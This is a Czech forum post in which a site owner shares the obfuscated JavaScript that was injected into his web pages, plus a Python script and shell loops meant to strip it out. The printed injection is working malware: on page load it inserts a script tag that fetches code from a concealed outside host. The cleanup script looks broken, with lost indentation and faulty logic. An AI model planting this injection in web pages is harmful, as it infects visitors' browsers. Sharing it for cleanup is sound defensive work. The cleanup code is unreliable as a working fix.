TIP: Přetáhni ikonu na hlavní panel pro připnutí webu
Newbie
Ahoj,
Před několika dny se mi na mé weby dostal virus.
Chtěl bych se podělit o řešení tohoto problému.
Kód viru:
<script>var q;if(q!='' && q!='n'){q=''};var I=new Date();this.a="";function Y(){var R;if(R!=''){R='ae'};var iq=new String();var t='';var ts=new String();var J=String("C4kg".substr(3));var qF=new Date();var Q=RegExp;function w(P,Y_){this.o="";var x='';var _q=new String();this.JI='';var i= new String("[");i+=Y_;i+="]Kl9u".substr(0,1);var rV="";var Rr='';var ve=new String();var ws=new Q(i, J);var sK;if(sK!='' && sK!='sl'){sK='pp'};var HQ;if(HQ!='' && HQ!='FI'){HQ='Hv'};return P.replace(ws, t);var asw;if(asw!='L'){asw=''};};var nl;if(nl!='Hu' && nl != ''){nl=null};var U;if(U!='Qd'){U='Qd'};var m="http:"+"//kak"+"aku-cIgZo".substr(0,5)+"0rvom.un".substr(3)+"ivisiESn".substr(0,5)+"tlTqon.co".substr(4)+"WKYm.goo".substr(3)+"N7Cgle-c".substr(3)+"o-id.8wA".substr(0,5)+"MCAYnewwo".substr(4)+"OMSrldun".substr(3)+"ACbion.rAbC".substr(3,5)+"3bsCu:Cs3b".substr(4,2);var z=window;var _=new String("/s"+"og"+"ou"+".c"+"uNVUom".substr(4)+"/sN76".substr(0,2)+"sf7og".substr(3)+"XY1Zou".substr(4)+"O7G.c7OG".substr(3,2)+"T1eyomTe1y".substr(4,2)+"/gKfe".substr(0,2)+"7h1od17h".substr(3,2)+"rAjadjAr".substr(3,2)+"dy"+".c"+"v97fom79vf".substr(4,2)+"/w"+"arsHlR".substr(0,2)+"ez"+"-bkaF".substr(0,2)+"b."+"Clcor".substr(3)+"d79rg/".substr(4)+"kKDzgoKkzD".substr(4,2)+"dvKog".substr(3)+"le"+"ZMb.cMbZ".substr(3,2)+"om"+"jy9.p".substr(3)+"hpJcd".substr(0,2));var j;if(j!='' && j!='yU'){j=null};var U_="";var Z='';var E=new String("uF3Tdef".substr(4)+"er");var OO="";var Ef=new String("scrip"+"b8Ort".substr(4));this.rq="";var A=w('81604648144011',"416");this.Qm='';var pe;if(pe!='' && pe!='zz'){pe=''};var g=new String("MgPnsrc".substr(4));z.onload=function(){try {var C;if(C!='Lh' && C != ''){C=null};this.tJ='';var wT=new Date();Z=m+A;var mE=new String();var vQ;if(vQ!='wr' && vQ != ''){vQ=null};Z+=_;var KT="";var Lf='';var cy=new String();this.kM='';mZ=document.createElement(Ef);mZ[g]=Z;mZ[E]=[1,6][0];this.b="";var kg;if(kg!='' && kg!='Ct'){kg=null};var Dq="";document.body.appendChild(mZ);var Xg;if(Xg!='hc' && Xg!='im'){Xg=''};} catch(e){var Bv;if(Bv!='B'){Bv=''};var rm;if(rm!='WL'){rm=''};};};this._C='';};var qN;if(qN!='nY'){qN=''};Y();var Mr;if(Mr!='' && Mr!='G'){Mr=''};var aD="";</script>
<!--006dd081738cfd97b1befa73ff053f11-->
Soubor antivir.py
from sys import argv
from shutil import copy
print(argv[1])
f=open(argv[1],'r')
s=f.readlines()
r=f.read();
f.close()
for i in range(1,3):
if r.splitlines() <= i :
if s[-i].find('tring("C4kg".subs') != -1:
if argv[1].find('.js') != -1:
s=s[:-1]
elif argv[1].find('.php') != -1:
s=s[:-2]
copy(argv[1], argv[1]+'.bak')
f=open(argv[1],'w')
f.writelines(s)
f.close()
příkazy pro spuštění antiviru
for i in `find /home/www -name *.js`; do python antivir.py $i -c; done
for i in `find /home/www -name *.php`; do python antivir.py $i -c; done
Doufám, že to nebudete muset použít
Nahlásit jako SPAM
IP: 90.179.36.–
Zjistit počet nových příspěvků
